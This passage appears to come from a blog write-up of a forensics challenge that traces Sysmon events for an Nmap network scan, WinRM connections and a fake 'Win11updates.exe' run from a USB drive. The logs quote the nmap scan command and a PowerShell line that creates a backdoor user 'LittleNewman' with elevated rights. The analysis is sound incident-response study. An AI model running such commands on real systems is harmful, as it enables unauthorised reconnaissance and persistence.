<span style="color: white;">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\</span><span style="color: #fcff01;"><b><span>LastLoggedOnUser</span>
<span>.\Newman</span></b></span>
<span style="color: white;">NT AUTHORITY\SYSTEM</span>
</pre></div>
</div><div><br /></div><div><div>This confirms that "Newman" last logged into the system at 23:09:13.</div><div><br /></div><div>We are able to see below that Newman has Nmap on his system, not sure why ths is needed:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:09:57.946 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b345-64bd-8c00-000000004200} </span>
<span style="color: white;"> ProcessId 6540 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">Image C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe </span></b></span>
<span style="color: white;"> FileVersion 3.10.11 </span>
<span style="color: white;"> Description Python </span>
<span style="color: white;"> Product Python </span>
<span style="color: white;"> Company Python Software Foundation </span>
<span style="color: white;"> OriginalFileName pythonw.exe </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>CommandLine "C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe" -c "from zenmapGUI.App import run;run()"</b></span><span style="color: white;"> </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> CurrentDirectory C:\Program Files (x86)\Nmap\ </span></b></span><b><span style="color: #fcff01;">
<span> User NEWMAN-PC\Newman </span></span></b>
<span style="color: white;"> LogonGuid {758cb1f7-b319-64bd-4ec6-050000000000} </span>
<span style="color: white;"> LogonId 0x5c64e </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel Medium </span>
<span style="color: white;"> Hashes MD5=0B3043DC9F9DB2C90D6E116F0862B2D1,SHA256=5198F9DCE2295F913EA0C1D21F0E3C92296F3926E7C1DC87B0308EE0BFD140FE,IMPHASH=CF4CF1ED1C13C236668C924DFD14E4B4 </span>
<span style="color: white;"> ParentProcessGuid {758cb1f7-b31c-64bd-5d00-000000004200} </span>
<span style="color: white;"> ParentProcessId 4132 </span>
<span style="color: white;"> ParentImage C:\Windows\explorer.exe </span>
<span style="color: white;"> ParentCommandLine C:\Windows\Explorer.EXE </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">ParentUser NEWMAN-PC\Newman </span></b></span>
</pre></div>
</div><div><br /></div><div><div>We next see that Nmap is used to scan network <i>10.240.240/0/24,</i> trying to performing a version scan, while enabling OS detection. This also seems more like Zenmap is being used to call the actual <i>nmap.exe</i> file.</div><div><br /></div><div><i>nmap.exe" -sV -T4 -O -F -oX C:\Users\Newman\AppData\Local\Temp\zenmap-cjwelvey.xml --version-light 10.240.240.0/24</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:10:05.705 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b34d-64bd-8e00-000000004200} </span>
<span style="color: white;"> ProcessId 6708 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>Image C:\Program Files (x86)\Nmap\nmap.exe </b></span>
<span style="color: white;"> FileVersion 7.94 </span>
<span style="color: white;"> Description Nmap </span>
<span style="color: white;"> Product Nmap </span>
<span style="color: white;"> Company Insecure.Org </span>
<span style="color: white;"> OriginalFileName nmap.exe </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">CommandLine "C:\Program Files (x86)\Nmap\nmap.exe" -sV -T4 -O -F -oX C:\Users\Newman\AppData\Local\Temp\zenmap-cjwelvey.xml --version-light 10.240.240.0/24 </span></b></span><b><span style="color: #fcff01;">
<span> CurrentDirectory C:\Program Files (x86)\Nmap\ </span>
<span> User NEWMAN-PC\Newman </span></span></b>
<span style="color: white;"> LogonGuid {758cb1f7-b319-64bd-4ec6-050000000000} </span>
<span style="color: white;"> LogonId 0x5c64e </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel Medium </span>
<span style="color: white;"> Hashes MD5=C7796D918785956C9235CCF3490132BF,SHA256=9C5B213A5E910E49781F540F1AB975B38BEC460C3B7B8DDA04B0C415D7C5343A,IMPHASH=5AFF993A0259F16A3997F947B2EEBD27 </span>
<span style="color: white;"> ParentProcessGuid {758cb1f7-b345-64bd-8c00-000000004200} </span>
<span style="color: white;"> ParentProcessId 6540 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">ParentImage C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe </span></b></span><b><span style="color: #fcff01;">
<span> ParentCommandLine "C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe" -c "from zenmapGUI.App import run;run()" </span>
<span> ParentUser NEWMAN-PC\Newman </span>
</span></b></pre></div>
</div><div><br /></div><div><div>Here is an example of TCP connection being made to "JERRY-PC" via NMAP. While the connection below to "JERRY-PC" is to port 135, there are also connections to port 139, 445</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:10:08.559 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b34d-64bd-8e00-000000004200} </span>
<span style="color: white;"> ProcessId 6708 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">Image C:\Program Files (x86)\Nmap\nmap.exe </span></b></span><b><span style="color: #fcff01;">
<span> User NEWMAN-PC\Newman </span></span></b>
<span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<b><span style="color: #fcff01;"><span> SourceIp 10.240.240.5 </span>
</span></b><span style="color: #fcff01;"><b><span> SourceHostname Newman-PC </span>
</b></span><b><span style="color: #fcff01;"><span> SourcePort 49676 </span>
</span></b><span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">DestinationIp 10.240.240.4 </span></b></span><b><span style="color: #fcff01;">
<span> DestinationHostname JERRY-PC </span>
<span> DestinationPort 139 </span></span></b>
<span style="color: white;"> DestinationPortName netbios-ssn </span>
</pre></div>
</div><div><br /></div><div><div>There are also connections to the host at 10.240.240.6 on ports 135, 139, 445 and 1433</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:10:08.560 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b34d-64bd-8e00-000000004200} </span>
<span style="color: white;"> ProcessId 6708 </span>
<b><span style="color: white;"> Image C:\Program Files (x86)\Nmap\nmap.exe </span>
<span style="color: white;"> User NEWMAN-PC\Newman </span>
</b><span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<span style="color: white;"> SourceIp 10.240.240.5 </span>
<span style="color: white;"> SourceHostname Newman-PC </span>
<span style="color: white;"> SourcePort 49681 </span>
<span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span style="color: white;"> DestinationIp 10.240.240.6 </span>
<span style="color: white;"> DestinationHostname - </span>
<span style="color: white;"> DestinationPort 1433 </span>
<span style="color: white;"> DestinationPortName ms-sql-s </span>
</pre></div>
</div><div><br /></div><div><div>Newman may not have recognized it, but because of the subnet chosing with no exclusion, he is also scanning his own machine :-)</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:10:35.832 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b34d-64bd-8e00-000000004200} </span>
<span style="color: white;"> ProcessId 6708 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> Image C:\Program Files (x86)\Nmap\nmap.exe </span></b></span><b><span style="color: #fcff01;">
</span></b><span><b><span style="color: #fcff01;"> User NEWMAN-PC\Newman</span></b><span style="color: white;"> </span></span>
<span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<b><span style="color: #fcff01;"><span> SourceIp 10.240.240.5 </span>
<span> SourceHostname Newman-PC </span>
</span></b><span style="color: white;"> SourcePort 49699 </span>
<span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">DestinationIp 10.240.240.5 </span></b></span><b><span style="color: #fcff01;">
<span> DestinationHostname Newman-PC </span></span></b>
<span style="color: white;"> DestinationPort 445 </span>
<span style="color: white;"> DestinationPortName microsoft-ds </span>
</pre></div>
</div><div><br /></div><div><div>If we had access to Newman's PC, we could corroborate this evidence by looking at the information in the registry.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName InvDB </span>
<span style="color: white;"> EventType SetValue </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">UtcTime 2023-07-23 23:10:47.421 </span></b></span>
<span style="color: white;"> ProcessGuid {758cb1f7-b312-64bd-1700-000000004200} </span>
<span style="color: white;"> ProcessId 1176 </span>
<span style="color: white;"> Image C:\Windows\System32\svchost.exe </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>TargetObject HKU\S-1-5-21-2404277346-2099594652-1884649452-1010\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe</b></span><span style="color: white;"> </span>
<span style="color: white;"> Details Binary Data </span>
<span style="color: white;"> User NT AUTHORITY\SYSTEM </span>
</pre></div>
</div><div><br /></div><div><div>Next up, we see a connection to port <i>5985</i> on <i>Jerry-PC</i> from <i>NEWMAN-PC</i> ON PORT <i>49704</i>. It is interesting than Newman knew of port <i>5985 </i>as I did not see any response/evidence for these in the logs. More importantly, as we know, this is a challenge, not a real world incident. Hence this is more than likely due to prior knowledge. It could also quite be that this was learned via scanning but the evidence was just not in the log. So many possibilities.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:07.856 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b3f8-64bd-a900-000000004200} </span>
<span style="color: white;"> ProcessId 6764 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span>Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe </span>
<span> User NEWMAN-PC\Newman </span></b></span>
<span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<span style="color: white;"> SourceIp 10.240.240.5 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">SourceHostname Newman-PC </span></b></span>
<span style="color: white;"> SourcePort 49704 </span>
<span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span style="color: white;"> DestinationIp 10.240.240.4 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> DestinationHostname JERRY-PC </span></b></span><b><span style="color: #fcff01;">
<span> DestinationPort 5985 </span></span></b>
<span style="color: white;"> DestinationPortName - </span>
</pre></div>
</div><div><br /></div><div><div>This information is confirmed by what was identified in the PCAP file and the analysis done above. The same is true for the following two connections from source port 49705 and 49706 respectively.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:08.243 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b3f8-64bd-a900-000000004200} </span>
<span style="color: white;"> ProcessId 6764 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span>Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe </span>
<span> User NEWMAN-PC\Newman </span></b></span>
<span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<span style="color: white;"> SourceIp 10.240.240.5 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">SourceHostname Newman-PC </span></b></span>
<span style="color: white;"> SourcePort 49705 </span>
<span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span style="color: white;"> DestinationIp 10.240.240.4 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">DestinationHostname JERRY-PC </span></b></span><b><span style="color: #fcff01;">
<span> DestinationPort 5985 </span></span></b>
<span style="color: white;"> DestinationPortName - </span>
</pre></div>
</div><div><br /></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:08.321 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b3f8-64bd-a900-000000004200} </span>
<span style="color: white;"> ProcessId 6764 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe </span></b></span><b><span style="color: #fcff01;">
<span> User NEWMAN-PC\Newman </span></span></b>
<span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<span style="color: white;"> SourceIp 10.240.240.5 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">SourceHostname Newman-PC </span></b></span>
<span style="color: white;"> SourcePort 49706 </span>
<span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span style="color: white;"> DestinationIp 10.240.240.4 </span>
<span style="color: #fcff01;"><span> <b>DestinationHostname JERRY-PC </b></span><b>
<span> DestinationPort 5985 </span></b></span>
<span style="color: white;"> DestinationPortName -</span>
</pre></div>
</div><div><br /></div><div><div>Transitioning to the logs for <i>Jerry-PC</i> at <i>10.240.240.4</i> to see exactly what was done by Newman on this system.</div><div><br /></div><div>I thought about starting the analysis from around the time Newman connected which was at "<i>UtcTime 2023-07-23 23:13:07.856</i>" from source IP <i>10.240.240.5</i> on source port <i>49704 </i>to destination port <i>5985 </i>on Jerry's PC. However, poking around the logs prior to that time, shows evidence of earlier problems. Let's look at some of these problems/concerns.</div><div><br /></div><div>Looks like Jerry might have also been the source of some of his own problems. A file named "<i>Win11updates.exe</i>" was loaded from the drive lettered "<i>E</i>". This may be a network mapped drive or a USB or some other rmedia.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:07.426 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38b-64bd-9900-000000003100} </span>
<span style="color: white;"> ProcessId 1600 </span>
<b><span style="color: #fcff01;"><span> Image E:\Win11updates.exe </span>
</span></b><span style="color: white;"> FileVersion - </span>
<span style="color: white;"> Description - </span>
<span style="color: white;"> Product - </span>
<span style="color: white;"> Company - </span>
<span style="color: white;"> OriginalFileName - </span>
<span style="color: #fcff01;"><b><span> CommandLine "E:\Win11updates.exe" </span>
<span> CurrentDirectory E:\ </span>
<span> User JERRY-PC\Jerry </span>
</b></span><span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-795a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a79 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">IntegrityLevel Medium </span></b></span>
<span style="color: white;"> Hashes MD5=25703C731DA76007CB83370106AA9A39,SHA256=35BB4785955B852476C63C06262F6C1079E1C850B6B2B9DE4EAC40349ED937AD,IMPHASH=0B5552DCCD9D0A834CEA55C0C8FC05BE </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b318-64bd-4500-000000003100} </span>
<span style="color: white;"> ParentProcessId 3440 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">ParentImage C:\Windows\explorer.exe </span></b></span><b><span style="color: #fcff01;">
<span> ParentCommandLine C:\Windows\Explorer.EXE </span>
<span> ParentUser JERRY-PC\Jerry </span></span></b>
</pre></div>
</div><div><br /></div><div>No evidence of executables was found on the USB disk provided. So where did this "<i>Win11updates.exe</i>" file come from?! Did I miss something? </div><div><br /></div><div>Well I did, while having a conversation with Jean he told me the evidence was right there, I just missed it. This reinforces the need to pay close attention to what your logs says. Here is the actual entry I missed initially.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span><span style="color: white;"> RuleName </span><b><span style="color: #fcff01;">Context,DeviceConnectedOrUpdated </span></b></span>
<span style="color: white;"> EventType SetValue </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:01.707 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b385-64bd-8a00-000000003100} </span>
<span style="color: white;"> ProcessId 7464 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>Image C:\Windows\System32\WUDFHost.exe</b></span><span style="color: white;"> </span>
<span style="color: #fcff01;"><b><span> TargetObject HKLM\System\CurrentControlSet\Enum\SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_General&Prod_UDisk&Rev_5.00#6&1526ad36&0&_&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\FriendlyName </span>
</b></span><b><span style="color: #fcff01;"><span> Details E:\ </span>
</span></b><span style="color: white;"> User NT AUTHORITY\LOCAL SERVICE </span>
</pre></div>
</div><div><br /></div><div>As we can see above, the USB was inserted and assigned drive letter E: This correlates with where the "<i>Win11updates.exe</i>" file was loaded.</div><div><br /></div><div>Back to normal programming.</div><div><br /></div><div>Interestingly, I see the file was loaded a second time. Notice the process ID change. Paying close attention to the integrity level, we see this second run is with higher level privileges. More like Administrator level privileges.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:09.645 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38d-64bd-9c00-000000003100} </span>
<span style="color: #fcff01;"><b><span> ProcessId 6648 </span>
<span> Image E:\Win11updates.exe</span></b></span><span style="color: white;"> </span>
<span style="color: white;"> FileVersion - </span>
<span style="color: white;"> Description - </span>
<span style="color: white;"> Product - </span>
<span style="color: white;"> Company - </span>
<span style="color: white;"> OriginalFileName - </span>
<span style="color: white;"> CommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">IntegrityLevel High </span></b></span>
<span style="color: white;"> Hashes MD5=25703C731DA76007CB83370106AA9A39,SHA256=35BB4785955B852476C63C06262F6C1079E1C850B6B2B9DE4EAC40349ED937AD,IMPHASH=0B5552DCCD9D0A834CEA55C0C8FC05BE </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b318-64bd-4500-000000003100} </span>
<span style="color: white;"> ParentProcessId 3440 </span>
<span style="color: white;"> ParentImage C:\Windows\explorer.exe </span>
<span style="color: white;"> ParentCommandLine C:\Windows\Explorer.EXE </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>We also see information about this "<i>Win11Updates.exe</i>" file is also written to the registry. Here we see one such example.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName InvDB-CompileTimeClaim </span>
<span style="color: #fcff01;"><b><span> EventType SetValue </span>
</b></span><span style="color: white;"> UtcTime 2023-07-23 23:11:09.730 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b311-64bd-1600-000000003100} </span>
<span style="color: white;"> ProcessId 1132 </span>
<span style="color: white;"> Image C:\Windows\System32\svchost.exe </span>
<b><span style="color: #fcff01;"><span> TargetObject \REGISTRY\A\{5dfb6902-580d-20f2-eee2-25aecfb2b037}\Root\InventoryApplicationFile\win11updates.exe|79834fe67b152d51\LinkDate </span>
<span> Details 07/20/2023 02:17:43 </span>
</span></b><span style="color: white;"> User NT AUTHORITY\SYSTEM </span>
</pre></div>
</div><div><br /></div><div><div>We also see the executable leverages Windows Visual C++ Runtime.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName DLL </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:09.770 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38d-64bd-9c00-000000003100} </span>
<span style="color: white;"> ProcessId 6648 </span>
<span style="color: white;"> Image E:\Win11updates.exe </span>
<b><span style="color: #fcff01;"><span> TargetFilename C:\Users\Jerry\AppData\Local\Temp\_MEI66482\VCRUNTIME140.dll </span>
</span></b><span style="color: white;"> CreationUtcTime 2023-07-23 23:11:09.770 </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>The <i>Win11Updates.exe </i>file then spawn a copy of itself</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:09.936 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<b><span style="color: #fcff01;"><span> ProcessId 5512 </span>
</span></b><span><b><span style="color: #fcff01;"> Image E:\Win11updates.exe</span></b><span style="color: white;"> </span></span>
<span style="color: white;"> FileVersion - </span>
<span style="color: white;"> Description - </span>
<span style="color: white;"> Product - </span>
<span style="color: white;"> Company - </span>
<span style="color: white;"> OriginalFileName - </span>
<span style="color: white;"> CommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> CurrentDirectory E:\ </span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=25703C731DA76007CB83370106AA9A39,SHA256=35BB4785955B852476C63C06262F6C1079E1C850B6B2B9DE4EAC40349ED937AD,IMPHASH=0B5552DCCD9D0A834CEA55C0C8FC05BE </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9c00-000000003100} </span>
<span style="color: white;"> ParentProcessId 6648 </span>
<span style="color: #fcff01;"><b><span> ParentImage E:\Win11updates.exe </span>
</b></span><span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div>Using the spawned "<i>Win11updates.exe</i>" we now see Powershell is spawned, executing a command to create a new user named "<i>LittleNewman</i>" with password "<i>password</i>" on "<i>JERRY-PC</i>". This process is using the current credentials of "<i>JERRY-PC\Jerry</i>".</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:10.510 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38e-64bd-9e00-000000003100} </span>
<b><span style="color: #fcff01;"><span> ProcessId 6236 </span>
</span></b><span><b><span style="color: #fcff01;"> Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</span></b><span style="color: white;"> </span></span>
<span style="color: white;"> FileVersion 10.0.22621.1635 (WinBuild.160101.0800) </span>
<span style="color: white;"> Description Windows PowerShell </span>
<span style="color: white;"> Product Microsoft® Windows® Operating System </span>
<span style="color: white;"> Company Microsoft Corporation </span>
<span style="color: white;"> OriginalFileName PowerShell.EXE </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span> CommandLine powershell -Command "Start-Process -FilePath \"cmd.exe\" -ArgumentList \"/c net user LittleNewman password /add\" -Verb RunAs" </span>
<span> CurrentDirectory E:\ </span></b></span>
<span style="color: white;"> User JERRY-PC\Jerry </span>
<span style="color: white;"> LogonGuid {3f0f5ad4-b317-64bd-235a-050000000000} </span>
<span style="color: white;"> LogonId 0x55a23 </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel High </span>
<span style="color: white;"> Hashes MD5=0499440C4B0783266183246E384C6657,SHA256=D436E66C0D092508E4B85290815AB375695FA9013C7423A3A27FED4F1ACF90BD,IMPHASH=342A7FD0A3177AE5549A5EEE99F82271 </span>
<span style="color: white;"> ParentProcessGuid {3f0f5ad4-b38d-64bd-9d00-000000003100} </span>
<span style="color: white;"> ParentProcessId 5512 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"> ParentImage E:\Win11updates.exe</span><span style="color: white;"> </span>
<span style="color: white;"> ParentCommandLine "E:\Win11updates.exe" </span>
<span style="color: white;"> ParentUser JERRY-PC\Jerry </span>
</pre></div>
</div><div><br /></div><div><div>As expected, the Powershell spawned the <i>cmd.exe</i> to execute the tasks above.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:11:11.181 </span>
<span style="color: white;"> ProcessGuid {3f0f5ad4-b38f-64bd-a000-000000003100} </span>
<b><span style="color: #fcff01;"><span> ProcessId 7880 </span>
